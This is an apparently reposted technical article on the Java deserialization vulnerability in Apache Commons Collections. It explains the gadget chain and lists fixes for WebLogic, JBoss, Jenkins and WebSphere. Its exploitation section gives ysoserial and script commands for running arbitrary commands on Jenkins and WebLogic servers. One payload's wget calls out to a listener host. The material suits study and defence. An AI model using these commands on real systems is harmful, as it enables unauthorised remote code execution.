Technical Analysis of Java deserialization Vulnerability

Source: Internet
Author: User

1. Background of Java deserialization Vulnerability

In short, serialization is the process of converting an object's state into a format that can be stored or transmitted (a byte stream). Deserialization is the reverse: it turns a byte stream back into an object. Together, the two make it easy to store and transmit data.

1.1 JAVA serialization

1. Java provides an object serialization mechanism in which an object is represented as a byte sequence. The sequence contains the object's data, information about the object's type, and the types of the data stored in the object.

2. Once a serialized object has been written to a file, it can be read back from the file and deserialized: the object type information, object data, and data types in the object are used to recreate the object in memory.

3. The whole process is independent of the Java Virtual Machine (JVM). An object serialized on Windows can be deserialized on CentOS; the process is cross-platform.

4. ObjectInputStream and ObjectOutputStream are high-level data streams that contain methods for serializing and deserializing objects.

The following is a sample code for Java to serialize an object to bytestream.

First, define a Person class that implements the Serializable interface.

A class can be serialized successfully only if the following conditions are met:

1. The class must implement the java.io.Serializable interface.

2. All attributes of the class must be serializable. An attribute that is not serializable must be marked transient (it then exists only in memory and is not written to the stream).

3. To determine whether a Java standard class is serializable, check whether the class implements the java.io.Serializable interface in its documentation.

The ObjectOutputStream class is used to serialize an object; its writeObject() method writes the object to the stream. The following is the sample code for serialization with writeObject(), which serializes the Person object to myPerson.ser.

When an object is serialized to a file, the file is given a .ser extension by Java's standard convention.

1.2 Java deserialization

The readObject() method of the ObjectInputStream class is used for deserialization. The following is the sample code for deserialization: it reads the serialized content from the myPerson.ser file and restores it to a Person object.

Normally, a well-formed data stream deserializes into the expected, harmless object.
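The serialization and deserialization round trip described above, written out as an added example (this is not the article's own sample code, which did not survive on this page). The class name Person and the file name myPerson.ser come from the article; the fields, the sample values and the transient field are assumptions chosen to show the conditions listed in section 1.1:

```java
import java.io.*;

// Added example: a Serializable Person class, written to myPerson.ser with
// ObjectOutputStream and read back with ObjectInputStream. Field names and
// sample values are assumptions, not taken from the article.
class Person implements Serializable {
    private static final long serialVersionUID = 1L;

    String name;
    int age;
    // A field that is not Serializable (or that must not leave memory) is
    // marked transient: writeObject() skips it and it comes back as null.
    transient Thread worker;

    Person(String name, int age) {
        this.name = name;
        this.age = age;
        this.worker = new Thread();
    }

    @Override
    public String toString() {
        return "Person{name=" + name + ", age=" + age + ", worker=" + worker + "}";
    }
}

public class SerializeDemo {
    // Serialize: object -> byte stream on disk (.ser is Java's conventional extension).
    static void serialize(Person p, File file) throws IOException {
        try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(file))) {
            out.writeObject(p);
        }
    }

    // Deserialize: byte stream -> object. The class to instantiate is taken from
    // the class descriptor inside the stream, not from the cast on this line;
    // the cast only checks the result afterwards.
    static Person deserialize(File file) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(file))) {
            return (Person) in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        File file = new File("myPerson.ser");
        Person original = new Person("Alice", 30);  // constructed sample value
        serialize(original, file);
        System.out.println("wrote " + file.length() + " bytes to " + file);

        Person restored = deserialize(file);
        System.out.println("restored: " + restored);
        // name and age survive the round trip; worker is null because transient
        // fields are not part of the serialized form.
    }
}
```

Compile and run with javac SerializeDemo.java && java SerializeDemo; the printed worker field is null after the round trip, which is the practical meaning of condition 2 above.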

If, however, the data being deserialized has been maliciously constructed, deserialization produces an unexpected, malicious object, which can lead to arbitrary code execution. In practice the ObjectInputStream class is responsible for deserialization: when readObject() runs, it reads the serialized byte stream. Because of how Java works, even though the read object will eventually hit a ClassCastException when it is cast to the expected type, the object has already been created and its constructor and class initializer have already been called, so a limited form of code execution has already taken place. ObjectInputStream places no restriction on the type of the object it creates, which widens the possibility of arbitrary code execution.

2. Analysis of the deserialization vulnerability through Apache Commons Collections

When generating a payload, the ysoserial tool supports four kinds: Apache Commons Collections 3 and 4, Groovy, and Spring. As long as the target application's class path contains one of these libraries, the payload generated by ysoserial makes readObject() execute arbitrary commands. Apache Commons Collections has the widest impact, so we focus on it here.

2.1 commons collections Overview

The Java Collections Framework was a major addition in JDK 1.2. It added powerful data structures that accelerate the development of most significant Java applications, and since then it has become the recognized standard for collection handling in Java.

Commons Collections seeks to build upon the JDK classes by providing new interfaces, implementations and utilities. Its features include:

Bag interface for collections that have a number of copies of each object

BidiMap interface for maps that can be looked up from value to key as well as key to value

MapIterator interface to provide simple and quick iteration over maps

Transforming decorators that alter each object as it is added to the collection

Composite collections that make multiple collections look like one

Ordered maps and sets that retain the order elements are added in, including an LRU based map

Reference map that allows keys and/or values to be garbage collected under close control

Many comparator implementations

Many iterator implementations

Adapter classes from arrays and enumerations to collections

Utilities to test or create typical set-theory properties of collections such as union, intersection, and closure

The official Apache Commons Collections introduction is available at:

https://commons.apache.org/proper/commons-collections/

Apache Commons Collections wraps Java's basic containers. It abstracts many powerful interfaces and adds many powerful data structures, which lightens the burden on developers and significantly accelerates the development of Java applications.

2.2 Using Apache Commons Collections to analyze the principle of the Java deserialization vulnerability

As described above, we can construct a special byte stream and restore it to an object through deserialization, and that object's constructor and class initializer get called in the process. So which classes have constructors that provide the ability to execute code? Researchers found that if commons-collections is on the application's classpath, ChainedTransformer and InvokerTransformer are very useful: the latter directly provides reflective invocation based on a class name and method name passed in at construction time!

These Transformer classes implement the transform() method. InvokerTransformer performs the reflective call described by the parameters given when it was constructed, and ChainedTransformer strings several transformers together so that they execute in sequence. Who calls these transformers? TransformedMap accepts them as parameters: when its setValue() is called, the transformers run, triggering code execution.

Who calls setValue() on the TransformedMap? So far we have prepared the explosive and the fuse; what remains is something to light it.

At this point, reading the source code, we find that sun.reflect.annotation.AnnotationInvocationHandler meets these conditions!

We can see that the class AnnotationInvocationHandler is Serializable; as mentioned earlier, only classes that implement Serializable can be serialized. In addition, during deserialization its readObject() calls setValue() for each entry of memberValues. The exploit author therefore constructs an AnnotationInvocationHandler, packs the transformers carrying the attack code (Runtime.exec) into a map, and passes that map to the handler as a parameter. The handler is serialized into a byte stream and sent directly to the vulnerable web application!

Here the commons-collections library only provides a vector for code execution; much like ROP for memory corruption vulnerabilities, it is a technique rather than the real vulnerability. The vulnerability is that developers casually use ObjectInputStream on externally exposed interfaces, so that specially constructed data can be deserialized maliciously.
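Section 1.2 notes that ObjectInputStream places no restriction on the type of object it creates, and the paragraph above locates the vulnerability in using it on an exposed interface. The following added example (not the article's code, and not the SerialKiller project's) shows the restriction that closes that gap: an ObjectInputStream subclass whose resolveClass() enforces an allowlist, which is the look-ahead approach that the SerialKiller mitigation in section 4 is built on. The Person class, the allowlist contents and the HashMap used as a stand-in for an unexpected type are assumptions:

```java
import java.io.*;
import java.util.*;

// Added example: look-ahead deserialization. Every class descriptor in the
// stream passes through resolveClass() before an instance of that class is
// created, so an unexpected type (such as a commons-collections functor) is
// refused before any of its code can run. Names below are assumptions.
public class LookAheadDeserialization {

    static class Person implements Serializable {
        private static final long serialVersionUID = 1L;
        String name;
        Person(String name) { this.name = name; }
    }

    static class AllowlistObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;

        AllowlistObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        // Invoked for each class descriptor read from the stream, ahead of
        // object creation. Anything not on the list is rejected here.
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            String name = desc.getName();
            if (!allowed.contains(name)) {
                throw new InvalidClassException(name, "class not on deserialization allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    // The classes this endpoint legitimately expects. The gadget classes named
    // in the article (e.g. org.apache.commons.collections.functors.InvokerTransformer)
    // are simply absent, so a stream that names them fails in resolveClass().
    static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
            Person.class.getName()));

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns the object if every class in the stream is allowed; otherwise
    // throws InvalidClassException without instantiating the rejected type.
    static Object safeDeserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowlistObjectInputStream(
                new ByteArrayInputStream(data), ALLOWED)) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Expected type: accepted.
        byte[] good = serialize(new Person("Alice"));   // constructed sample
        Person p = (Person) safeDeserialize(good);
        System.out.println("accepted: " + p.name);

        // Any type not on the list (a HashMap here, constructed as a harmless
        // stand-in for an unexpected class) is rejected before construction.
        byte[] unexpected = serialize(new HashMap<String, String>());
        try {
            safeDeserialize(unexpected);
            System.out.println("BUG: unexpected type was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.classname + " (" + e.getMessage() + ")");
        }
    }
}
```

The subclass approach works on the Java 7 JDK used in this article's test environment. On Java 9 and later the same policy can instead be attached with ObjectInputStream.setObjectInputFilter() and a pattern built by ObjectInputFilter.Config.createFilter() (JEP 290), which also lets you cap stream depth and array sizes; whichever mechanism is used, the point is that the allowlist is checked before the object exists, not after the cast.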

3. Deserialization vulnerability exploitation practice: Jenkins and WebLogic

3.1 JENKINS

First, generate the payload for the command to be executed, with the following command:

java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'command' > payload

Here command is the command we want to execute on the target machine. Note that the command's output is not echoed back, so we cannot directly tell whether it ran successfully and must use an indirect method.

After generating the payload, run the following command to send the attack code:

python jenkins.py ip port payload

jenkins.py is for the Jenkins service; for other services, replace it with the corresponding Python file. Then come the target IP address and port, and finally payload is the file just generated.

Obtaining the execution result: as noted, the command has no echo, so we use an indirect method. Set up a temporary web server on the public network and have the target machine connect to it. If the command runs successfully, the target machine requests our web page, and by reading the web server logs we can tell which IP addresses are vulnerable.

The following is an example:

Generate the payload for the command wget -O - http://192.168.1.212/.

http://192.168.1.212/ is the temporary web server.

java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O - http://192.168.1.212/' > payload

First, clear the web access log.

echo > /var/log/nginx/access.log

Then send the malicious data to the target machine:

python jenkins.py 192.168.1.212 8088 payload

View the log again:

tail /var/log/nginx/access.log

After the command runs we can see that a machine has accessed our web server, which confirms that the command executed successfully.

3.2 WEBLOGIC

Testing WebLogic is a little harder than with jenkins.py. The scripts provided by Foxglovesec are not smart enough: for a different command you need to modify the test script by hand. The following sections describe the steps one by one.

First, describe how to build the test environment.

The test environment uses CentOS 6.5 + WebLogic 10.3.6.0.

Download WebLogic from Oracle's official website and extract it. Then enter the directory and open a terminal.

Run

export JAVA_HOME=/home/myhome/myjavahome

export MW_HOME=/home/myhome/mywls

JAVA_HOME is the Java installation directory on the system; on CentOS it is /usr/lib/jvm/java-1.7.0-openjdk/. If Java is not installed, install it with yum install java-1.7.0-openjdk.i686.

MW_HOME is the directory that was just extracted.

Run

./configure.sh

Set the WebLogic environment variables:

$MW_HOME/wlserver/server/bin/setWLSEnv.sh

We can see that there are two main environment variables: CLASSPATH and PATH.

Then confirm that the environment variables were set successfully:

echo $CLASSPATH

echo $PATH

If the above prints nothing, the setting did not take effect and you need to export the variables manually.

These environment variables are only valid in the current terminal.

Create a domain.

The graphical configuration interface is used here:

$MW_HOME/wlserver/common/bin/config.sh

This is straightforward; keep clicking through to the next step.

Finally a user_projects directory is created under the current directory containing our domain. Go to its innermost directory and run startWebLogic.sh to start the service; enter the account and password, and the service starts once they are verified.

Test script

The WebLogic test script provided by Foxglovesec requires generating the payload with ysoserial and then patching the first four bytes of the payload according to its total length. I have modified the original test script so that a test only needs the command we want to execute:

python weblogic.py 192.168.1.212 7001 'rm -f /tmp/kernux'

This is similar to the script provided by c0debreak; the serialized packet is rewritten using c0debreak's, because the original ysoserial one has a bug.

Before running the test script

Run the test script

After running the test script

Access records from the virtual machine show that the command executed successfully.

Two modified test scripts are provided in the attachment:

python weblogic.py 192.168.1.212 7001 'rm -f /tmp/kernux'

python jenkins.py 192.168.1.212 8080 'rm -f /tmp/kernux'

4. Quick troubleshooting and fixing of Java deserialization vulnerabilities

Currently, the main widely used components that bundle the Apache Commons Collections library are Jenkins, WebLogic, JBoss, WebSphere and OpenNMS. Most Jenkins functions need to be exposed directly to the public network.

First, check whether the product contains any of the above five components.

Use grep or another search command to check whether the installation directories of the above components contain the Apache Commons Collections library, by searching for the following jar files:

commons-collections.jar

*.commons-collections.jar

apache.commons.collections.jar

*.commons-collections.*.jar

For more information, see the following solutions.

4.1 WEBLOGIC

Temporary solution

1. Use SerialKiller as a replacement for the ObjectInputStream class when deserializing;

2. Delete the file org/apache/commons/collections/functors/InvokerTransformer.class;

Official Solution

Official statement:

http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html

Weblogic users will receive official repair support

4.2 JBOSS

Temporary solution

1. Delete the InvokerTransformer, InstantiateFactory and InstantiateTransformer class files

Official Solution

Please follow the official issue:

https://issues.apache.org/jira/browse/COLLECTIONS-580

4.3 JENKINS

Temporary solution

1. Use SerialKiller as a replacement for the ObjectInputStream class when deserializing;

2. Delete the file org/apache/commons/collections/functors/InvokerTransformer.class;

Official Solution

Official patch announcement links:

https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli

https://github.com/jenkinsci-cert/SECURITY-218

4.4 WEBSPHERE

Temporary solution

1. Use SerialKiller as a replacement for the ObjectInputStream class when deserializing;

2. Delete the file org/apache/commons/collections/functors/InvokerTransformer.class;

SerialKiller temporary patch: https://github.com/ikkisoft/SerialKiller
